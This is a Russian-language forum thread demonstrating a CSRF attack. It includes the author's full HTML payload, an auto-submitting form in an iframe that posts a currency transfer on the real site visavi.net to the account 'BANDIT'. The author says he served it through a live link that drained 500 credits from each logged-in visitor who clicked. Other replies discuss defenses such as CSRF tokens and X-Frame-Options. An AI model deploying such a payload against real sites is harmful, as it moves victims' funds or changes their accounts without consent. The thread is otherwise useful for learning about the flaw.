Недооцененная CSRF уязвимость!

Решил написать так как многие почему то не недооценивают данный вид атаки и часто забывают о нем при проектировании веб приложения.
https://ru.wikipedia.org/wiki/Межсайтовая_подделка_запроса

Добавлено через 07:34 сек.
Что бы посмотреть в действии - кликай сюда)
P.S при каждом переходе по ссылке вы перечислите мне 500 чатлов, ничего не подозревая при этом.
Принцип работы следующий: на странице ifrmae в котором заполненная нужным мне образом форма. При загрузке iframe срабатывает JS который автоматически отправляет ее на адрес не защищенного сайта.
Это лишь один пример использования. И Вместо перечисления чатлов может быть смена пароля админа, отправка реальных денег и тд.

Для выполнения атаки нужно что бы залогиненная жертва перешла по вашей ссылке.

что у тебя в form.html?

<form action="http://visavi.net/pages/perevod.php?act=send&amp;uz=BANDIT&amp;uid=0" method="post" id="form">
    <input type="text"name="money" value="500">
    <textarea cols="25" rows="5" name="msg">CSRF</textarea>
    <input type="submit" value="Перевести">
</form>
<script>
    document.getElementById('form').submit();
</script>

3. G_A_N_J_A_R, гм... и этим ты мне комп в состояние зомби вогнал? 0_о

4. странный побочный эффект)

да, повторно без проблем прошло.
хорошо что я токены использую во всех формах

X-Frame-Options: DENY на сервер, если капчи нет
Хотя хз, возможно и не поможет. Не вникал сильно

отличная штука
токены - оптимальное решение всех головняков. на ВК токены везде передаются, даже где впринципе нету ничего подозрительного.

1. G_A_N_J_A_R, вот блин, а ну отдай мне 500 чатлов !!

Добавлено через 06:20 сек.
просто оставлю это здесь
http://m.habrahabr.ru/post/235247/

9. Jahak, спасибо за статью, уже читал когда то, но было полездно прочитать её еще раз. =)